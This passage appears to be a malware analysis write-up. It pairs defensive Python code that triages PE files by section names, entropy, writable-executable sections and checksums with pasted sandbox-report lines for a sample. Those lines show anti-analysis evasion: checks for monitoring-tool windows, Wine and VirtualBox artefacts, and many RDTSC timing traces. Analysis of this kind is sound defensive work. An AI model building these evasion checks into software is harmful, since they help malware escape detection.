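    pe, findings = parse_pe(image), []
    for s in pe["sections"]:
        name = s["name"]
        if not name.strip() or not name.isprintable():
            findings.append(f"section with blank/special-char name {name!r}")
        elif name not in STANDARD_SECTIONS:
            findings.append(f"non-standard section name {name!r}")
        if s["chars"] & SCN_WRITE and s["chars"] & SCN_EXECUTE:
            findings.append(f"section {name!r} is writable and executable")
        ent = shannon_entropy(s["data"])
        if ent > 7.0:
            findings.append(f"section {name!r} entropy {ent:.2f} (packed or encrypted)")
        if s["va"] <= pe["entry_rva"] < s["va"] + max(s["vsize"], len(s["data"])) and name != ".text":
            findings.append(f"entry point 0x{pe['entry_rva']:x} lies in {name!r}, not .text")
    computed = pe_checksum(image, pe["checksum_offset"])
    if pe["stored_checksum"] and pe["stored_checksum"] != computed:
        findings.append(f"checksum 0x{pe['stored_checksum']:x} should be 0x{computed:x}")
    return findings


def build_fake_pe(sections, entry_rva, stored_checksum):
    """Constructed PE32 test image from [(name, va, data, characteristics), ...]."""
    opt_size = 0xE0
    raw_ptr = (0x40 + 4 + 20 + opt_size + 40 * len(sections) + 0x1FF) & ~0x1FF   # 512-byte aligned
    hdr = bytearray(b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40))           # e_lfanew = 0x40
    hdr += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                                        # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)
    struct.pack_into("<I", opt, 64, stored_checksum)
    hdr += opt
    body = bytearray()
    for name, va, data, chars in sections:
        hdr += struct.pack("<8sIIIIIIHHI", name, len(data), va, len(data), raw_ptr + len(body), 0, 0, 0, 0, chars)
        body += data.ljust((len(data) + 0x1FF) & ~0x1FF, b"\0")
    return bytes(hdr.ljust(raw_ptr, b"\0") + body)


HIGH_ENTROPY = bytes(range(256)) * 16   # deterministic 8.0 bits/byte filler
SAMPLE_SECTIONS = [                      # names and rights from the report, contents constructed
    (b"", 0x1000, b"\x90" * 64 + b"\xC3", SCN_READ | SCN_WRITE | SCN_EXECUTE),
    (b".rsrc", 0x2000, b"\0" * 512, SCN_READ | SCN_WRITE),
    (b".idata", 0x3000, b"\0" * 512, SCN_READ | SCN_WRITE),
    (b"fgyethhk", 0x4000, HIGH_ENTROPY, SCN_READ | SCN_WRITE | SCN_EXECUTE),
    (b".taggant", 0x9000, b"\x55\x8B\xEC" + b"\x90" * 61, SCN_READ | SCN_WRITE | SCN_EXECUTE),
]
SAMPLE_IMAGE = build_fake_pe(SAMPLE_SECTIONS, entry_rva=0x9000, stored_checksum=0x20FCDD)

if __name__ == "__main__":
    print(*triage(SAMPLE_IMAGE), sep="\n")
```

To run this against a real file, replace SAMPLE_IMAGE with `open(path, "rb").read()`; parse_pe handles only PE32 (the 32-bit layout this sample uses) and reads no data directories, which is all the checks above need. A checksum mismatch on its own is weak evidence, since many legitimate linkers leave the field zero or stale, which is why triage skips a stored value of zero and why the report pairs it with the section-name and entropy indicators.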

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-37883
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BAF0B second address: 12BAF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BAF0F second address: 12BAF13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BAF13 second address: 12BAF4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007FC400504824h 0x00000010 popad 0x00000011 jmp 00007FC400504826h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BA024 second address: 12BA04F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007FC400D80DAEh 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC400D80DB5h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BA1D7 second address: 12BA1F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC40050481Ah 0x00000009 jmp 00007FC400504821h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BA1F7 second address: 12BA210 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400D80DB4h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BA210 second address: 12BA216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BA3A4 second address: 12BA3AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BA3AA second address: 12BA3BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jne 00007FC400504816h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BA3BD second address: 12BA3C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BA7A9 second address: 12BA7AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BA7AF second address: 12BA7F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400D80DB6h 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jg 00007FC400D80DC6h 0x00000015 pushad 0x00000016 push edi 0x00000017 pop edi 0x00000018 push edx 0x00000019 pop edx 0x0000001a jmp 00007FC400D80DB4h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BC2BF second address: 12BC2F5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jns 00007FC400504824h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007FC40050481Ch 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BC2F5 second address: 12BC2F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BC2F9 second address: 12BC2FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BC2FF second address: 12BC345 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC400D80DACh 0x00000008 jno 00007FC400D80DA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 and edx, 6ECD5AAAh 0x00000017 jo 00007FC400D80DAAh 0x0000001d mov dx, 53B7h 0x00000021 push 00000003h 0x00000023 push 00000000h 0x00000025 mov dx, DBB1h 0x00000029 mov dword ptr [ebp+122D2799h], edx 0x0000002f push 00000003h 0x00000031 mov dl, C7h 0x00000033 call 00007FC400D80DA9h 0x00000038 push eax 0x00000039 push edx 0x0000003a push ebx 0x0000003b jo 00007FC400D80DA6h 0x00000041 pop ebx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BC345 second address: 12BC35F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC400504826h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BC35F second address: 12BC363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BC363 second address: 12BC3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a jmp 00007FC40050481Fh 0x0000000f pop ebx 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 push ecx 0x00000016 pushad 0x00000017 popad 0x00000018 pop ecx 0x00000019 jmp 00007FC400504820h 0x0000001e popad 0x0000001f mov eax, dword ptr [eax] 0x00000021 jmp 00007FC40050481Ch 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jbe 00007FC40050481Ch 0x00000032 jno 00007FC400504816h 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BC3B7 second address: 12BC3CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC400D80DB4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BC619 second address: 12BC62F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007FC40050481Bh 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DBA4A second address: 12DBA50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DBA50 second address: 12DBA54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DBD43 second address: 12DBD47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DBEFA second address: 12DBF04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC400504816h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DC1AA second address: 12DC1B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DC1B2 second address: 12DC1BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DC2F2 second address: 12DC307 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC400D80DABh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DC307 second address: 12DC30D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DC30D second address: 12DC311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DC63A second address: 12DC63E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DC63E second address: 12DC657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC400D80DB3h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DC7B0 second address: 12DC7B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DC7B4 second address: 12DC7BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DC7BD second address: 12DC7CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FC400504816h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DC8FD second address: 12DC901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DC901 second address: 12DC905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DC905 second address: 12DC921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007FC400D80DB0h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DC921 second address: 12DC93A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jnl 00007FC400504816h 0x0000000f pushad 0x00000010 popad 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 push esi 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DCDB0 second address: 12DCDC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FC400D80DB1h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12E1BC5 second address: 12E1BD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FC40050481Dh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12E1BD8 second address: 12E1BDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12E1BDC second address: 12E1BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12E1BE6 second address: 12E1BEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12E30FB second address: 12E3101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12E3101 second address: 12E3106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12E434A second address: 12E4366 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC40050481Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12E8036 second address: 12E803A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12E803A second address: 12E8042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12E8042 second address: 12E805F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400D80DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push esi 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12E81A7 second address: 12E81B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12EAEB0 second address: 12EAEC2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC400D80DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FC400D80DACh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12EB16A second address: 12EB175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12EBF9D second address: 12EBFA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12EF291 second address: 12EF339 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400504827h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push ecx 0x0000000c jmp 00007FC40050481Bh 0x00000011 pop ecx 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007FC400504818h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d call 00007FC400504821h 0x00000032 jmp 00007FC400504823h 0x00000037 pop esi 0x00000038 push 00000000h 0x0000003a movzx esi, dx 0x0000003d push 00000000h 0x0000003f jp 00007FC40050481Ch 0x00000045 xchg eax, ebx 0x00000046 jne 00007FC40050482Ch 0x0000004c push eax 0x0000004d push ecx 0x0000004e jng 00007FC40050481Ch 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12EF00A second address: 12EF02D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 je 00007FC400D80DCAh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC400D80DB2h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12EFDC7 second address: 12EFDCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12EFDCB second address: 12EFDCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12EFDCF second address: 12EFDD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F093E second address: 12F0947 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F3B3E second address: 12F3B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jl 00007FC40050482Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC40050481Ch 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F4B06 second address: 12F4B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F4B0A second address: 12F4B0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F5A2D second address: 12F5A31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F5A31 second address: 12F5A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FC400504818h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F5A43 second address: 12F5A48 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F6C28 second address: 12F6C2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F6C2C second address: 12F6C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F6C32 second address: 12F6C3C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC40050481Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F7B40 second address: 12F7B54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007FC400D80DAEh 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F3D6F second address: 12F3D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F5BD7 second address: 12F5BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F4C62 second address: 12F4CE2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC400504816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov ebx, dword ptr [ebp+122D2517h] 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov edi, 4A0559D5h 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push esi 0x0000002a call 00007FC400504818h 0x0000002f pop esi 0x00000030 mov dword ptr [esp+04h], esi 0x00000034 add dword ptr [esp+04h], 00000018h 0x0000003c inc esi 0x0000003d push esi 0x0000003e ret 0x0000003f pop esi 0x00000040 ret 0x00000041 xor dword ptr [ebp+12483CE6h], edx 0x00000047 jmp 00007FC400504828h 0x0000004c mov eax, dword ptr [ebp+122D0A01h] 0x00000052 mov dword ptr [ebp+122D1C5Dh], edi 0x00000058 push FFFFFFFFh 0x0000005a mov dword ptr [ebp+122D1C1Bh], eax 0x00000060 push eax 0x00000061 pushad 0x00000062 pushad 0x00000063 push ebx 0x00000064 pop ebx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FAA5C second address: 12FAA67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F3D75 second address: 12F3D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F5BDB second address: 12F5BE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F7CE6 second address: 12F7CED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F8C19 second address: 12F8C2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC400D80DAFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FAA67 second address: 12FAA7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC40050481Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F3D79 second address: 12F3D7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
